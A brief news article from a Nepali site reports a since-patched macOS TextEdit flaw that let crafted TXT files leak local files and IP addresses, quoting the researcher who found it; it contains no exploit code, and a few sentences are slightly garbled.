Apple macOS TextEdit Parsing Flaw leaked local Files via Dangling

Apple macOS TextEdit
Share It On:

25th April 2021, Kathmandu

Apple macOS TextEdit parsing flaw leaked local files via dangling markup injection

UPDATED A vulnerability in macOS allowed attackers to execute malicious HTML on TXT files which, if opened by victims, could leak its IP address and, worse, allow access to local files.

Now patched, the security flaw came from how TXT files were analyzed by TextEdit, Apple̵

7;s open-source application that opens TXT files by default.

Despite these developments – and the 2019 discovery of memory corruption bugs that led to RCE in Microsoft’s similar text editor, Notepad – antivirus software, firewalls, and macOS Gatekeeper treat TXT files “as secure downloads that can be malicious” because they allegedly contain only text, said security researcher Paulos Yibelo in a blog post.

“They should not blindly trust TXT files,” says the researcher The Daily Swig. Regardless of the file type, “what interprets the file and how it is interpreted means more than anything else.” TXT or another extension “can be harmful if PHP includes it as code,” he adds.


Share It On:

Recent Posts

Citizens Bank 11.11 Deals: Exclusive Discounts on Daraz

Citizens Bank 11.11 Deals: Exclusive Discounts on Daraz

Share It On:5th November 2024, Kathmandu Citizens Bank International Limited signed an agreement with Nepal’s leading online marketplace, Daraz, to

Local Talent Shines in Cybersecurity: Bipu Ojha and Tuan Khuat Win CDU IT CodeFair CTF

Local Talent Shines in Cybersecurity: Bipu Ojha and Tuan Khuat

Share It On:5th November 2024, Kathmandu Bipu Ojha and his teammate Tuan Khuat have emerged as winners in the prestigious

CEDB Hydropower’s Extraordinary General Meeting Concluded: Five Directors Elected

CEDB Hydropower’s Extraordinary General Meeting Concluded: Five Directors Elected

Share It On: 5th November 2024, Kathmandu CEDB Hydropower Development Company Limited has successfully concluded its extraordinary general meeting. CEDB

Government’s Journalist Accident Insurance Program: Apply Now For Your Protection

Government’s Journalist Accident Insurance Program: Apply Now For Your Protection

Share It On: 5th November, Kathmandu The Department of Information and Broadcasting has announced the launch of a new insurance

Nepal Life’s Property Acquisition in Hetauda: A Strategic Move For Growth

Nepal Life’s Property Acquisition in Hetauda: A Strategic Move For

Share It On:5th November, Kathmandu Nepal Life Insurance, a leading life insurance company in Nepal, has recently expanded its footprint

Global IME Dividend Announcement: Key Book Closure Date Revealed

Global IME Dividend Announcement: Key Book Closure Date Revealed

Share It On:5th November 2024, Kathmandu Global IME Bank has good news for its shareholders! The bank has announced a